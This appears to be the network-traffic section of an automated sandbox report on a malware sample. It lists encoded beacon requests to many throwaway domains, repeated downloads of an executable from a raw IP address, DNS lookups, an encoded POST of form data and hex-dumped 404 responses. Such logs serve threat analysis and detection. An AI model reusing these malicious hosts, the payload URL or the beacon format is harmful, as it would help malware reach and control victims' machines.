                Source: global trafficHTTP traffic detected: GET /fc2m/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=KaGAZ9vwQsncwU5nwlZluG2PCpLyPNSLaK7d9k0MP6z2D5ilW5umnwpx9tHUSLWoKaQi0X2AhHSzaYzkOXBuKcmexX+9MUXLmjX2PXKDTiDXtSOs+tfg8AM= HTTP/1.1Host: www.030002128.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /0b3u/?9B_ppt=tWVMWWWOulwRw9KA3wu02d5KKGx3TcL9CpbeAEn5Jw6VZuj1AgCYZL+g8ZTCy/ZQwoOBNq7+YyWmcbYUwrN2tYgo9+cX77aYkG8YuMsAadwBJ35R4yxBFts=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1Host: www.quicktraze.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /dashboard/xl.exe HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)Host: 45.200.148.45Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /dashboard/xl.exe HTTP/1.1Host: 45.200.148.45Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /irzc/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=nYLQ8syZYIEqykNPtdlYwElZKL5y37q0UOpjKQ4AHu5ne0cyyooyzOVigyhm4upFaEQ5FVDL9IYlN2EnnOtWol53ChrSdq3Cue46r4D6qSkCmEW9rZbuVVo= HTTP/1.1Host: www.tenmyk.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /fhx4/?9B_ppt=La2w8Dit9+06W6UDzOpyWaSJwhDt0En/zF10s3Y0GLWWp3W5XYBJe4ay5kbJYoMqdVQ5UuPTPFY7LReVYSqnXR+zSVGbwszjyZbrKje2k/1r3Ly4XgGf/cA=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1Host: www.tlcatlas.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /i7vz/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=Uo31g2cBlJ7Y51X9qiyWPllw2i3mGNMb8MW7X7OuPhPba7zW9vHCK1/tPALhEq4c3dLOMnOYn0E6ZXOZtUsElcj8T2RWijJqpTgaIG46XXD/8sezv8KfXnc= HTTP/1.1Host: www.xphone.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /r67x/?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYztsjxkrAaNpZX0l6jkYi+VfuO97QxGNgBCFFWLt6B6VM0bCruEmjStFMTCnvezkXJEF9Ro0QfaPDcmWgUP4M=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1Host: www.basicreviews.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /3qlo/?9B_ppt=T329z6mTpDO/RjmIsaX6GxS+fVaV1tgKwTndei0jE2s03jQmQlLR7HOZ8ZNHnRQMcrtNhio3hbZStuVrccVySYYypr0GxKLOZ6Y8dZz+3cHpxqLj7fYKvSQ=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1Host: www.stationseek.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /tycs/?9B_ppt=JnL2shJTRGPmh49fpIgYgN5+UFlzCIkQlKFRWx+imQO/VZY5IL7EOXQuybzppj9USUhCNE2Oi8OvmQ7twQzrLnOW74Dzktiy3u2kYAFK0p92dbQcp3RrNNk=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1Host: www.solarand.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficHTTP traffic detected: GET /er88/?9B_ppt=i44cfvhGA8d2n3UYXaCGfuZ18OIgEphd3DXa+grkxbY00W8PtxsyWNCcnvl5XmwHEQha9wDhby9/6Haw/gmAEUgIq47tXTEuO1ZaxpFdonJQgsoz6uRXQGU=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1Host: www.030002059.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                Source: global trafficDNS traffic detected: DNS query: www.idsmart.online
                Source: global trafficDNS traffic detected: DNS query: www.sortcouponspot.shop
                Source: global trafficDNS traffic detected: DNS query: www.030002128.xyz
                Source: global trafficDNS traffic detected: DNS query: www.quicktraze.website
                Source: global trafficDNS traffic detected: DNS query: www.tenmyk.shop
                Source: global trafficDNS traffic detected: DNS query: www.tlcatlas.xyz
                Source: global trafficDNS traffic detected: DNS query: www.xphone.net
                Source: global trafficDNS traffic detected: DNS query: www.basicreviews.online
                Source: global trafficDNS traffic detected: DNS query: www.89180.app
                Source: global trafficDNS traffic detected: DNS query: www.stationseek.online
                Source: global trafficDNS traffic detected: DNS query: www.solarand.online
                Source: global trafficDNS traffic detected: DNS query: www.030002059.xyz
                Source: global trafficDNS traffic detected: DNS query: www.salju777-rtp.click
                Source: global trafficDNS traffic detected: DNS query: www.tdassetmgt.info
                Source: unknownHTTP traffic detected: POST /90oi/ HTTP/1.1Host: www.sortcouponspot.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-usOrigin: http://www.sortcouponspot.shopCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 203Referer: http://www.sortcouponspot.shop/90oi/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)Data Raw: 39 42 5f 70 70 74 3d 62 66 75 52 74 77 54 74 50 53 7a 46 71 48 50 68 4c 70 57 6c 65 54 64 51 4f 5a 6a 43 57 34 42 4f 49 78 39 4f 63 52 73 63 6a 35 61 63 36 69 4c 33 4a 32 49 58 4e 51 59 51 53 4b 73 69 72 68 54 31 42 37 57 44 32 4f 5a 42 78 38 72 6e 49 46 4a 74 6d 78 31 38 57 6d 6e 32 75 78 76 71 6f 4f 4c 49 30 45 5a 72 36 48 36 5a 47 62 6b 61 64 51 44 4c 7a 5a 71 69 56 4c 78 4e 66 39 4a 75 74 43 6a 4f 6f 50 30 72 75 74 48 32 57 7a 4d 41 63 51 57 59 73 4a 79 34 58 47 69 74 76 7a 42 57 50 4e 51 54 57 64 56 34 78 7a 6e 63 33 76 30 30 58 54 68 32 6c 4d 79 4b 36 55 70 71 30 50 35 59 62 53 6d 6b 30 77 3d 3d Data Ascii: 9B_ppt=bfuRtwTtPSzFqHPhLpWleTdQOZjCW4BOIx9OcRscj5ac6iL3J2IXNQYQSKsirhT1B7WD2OZBx8rnIFJtmx18Wmn2uxvqoOLI0EZr6H6ZGbkadQDLzZqiVLxNf9JutCjOoP0rutH2WzMAcQWYsJy4XGitvzBWPNQTWdV4xznc3v00XTh2lMyK6Upq0P5YbSmk0w==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:07:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:07:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:07:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:07:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:07:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 